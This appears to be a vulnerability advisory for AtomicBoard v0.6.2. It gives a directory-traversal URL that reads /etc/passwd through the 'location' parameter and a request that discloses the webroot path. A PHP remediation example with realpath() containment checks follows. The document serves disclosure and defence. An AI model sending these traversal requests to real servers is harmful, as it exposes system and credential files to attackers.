There is a vulnerability in the current version of AtomicBoard
(AtomicBoard v0.6.2) that allows an attacker to retrieve files from the
webserver with the webserver's ID. The failure also exposes the path of
the webroot.
File retrieval:
http://server/atomicboard/index.php?location=../../../../../../etc/passwd
RESPONSE:
Complete contents of the specified file.
Path Disclosure:
http://server/AtomicBoard-0.6.2/index.php?location=anything
RESPONSE:
Class.TemplateEngine::loadFile: file not found (/www/webs/groovy.no-ip.com/AtomicBoard-0.6.2/include/anything)
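One way to close both issues, shown as an added example that is not AtomicBoard's code: canonicalise the requested location with realpath(), serve it only if it stays inside the include directory, and answer every rejection with the same generic error so no filesystem path reaches the client. The function name resolveTemplate() and the temporary directory layout are assumptions made for the demo.

```php
<?php
// Added example, not AtomicBoard code. resolveTemplate() and the demo
// directory layout are hypothetical.

// Map a user-supplied "location" to a file inside $baseDir, or null to reject.
function resolveTemplate(string $baseDir, string $location): ?string
{
    // Reject empty input and NUL bytes before touching the filesystem.
    if ($location === '' || strpos($location, "\0") !== false) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // realpath() collapses "../" and follows symlinks; false if the file is missing.
    $path = realpath($base . DIRECTORY_SEPARATOR . $location);
    if ($path === false || !is_file($path)) {
        return null;
    }
    // Containment check: the canonical path must begin with "<base>/".
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo: an include directory with one template and a file outside it.
$root = sys_get_temp_dir() . '/ab_demo_' . bin2hex(random_bytes(4));
mkdir("$root/include", 0700, true);
file_put_contents("$root/include/main.tpl", "hello");
file_put_contents("$root/secret.txt", "outside include dir");

foreach (['main.tpl', '../secret.txt', '../../../../../../etc/passwd', 'anything'] as $loc) {
    $file = resolveTemplate("$root/include", $loc);
    if ($file === null) {
        // Same reply for "missing" and "outside base"; details go to the server log only.
        error_log('rejected location: ' . json_encode($loc));
        echo "$loc => 404 Not Found\n";
    } else {
        echo "$loc => served " . basename($file) . "\n";
    }
}
array_map('unlink', ["$root/include/main.tpl", "$root/secret.txt"]);
rmdir("$root/include");
rmdir($root);
```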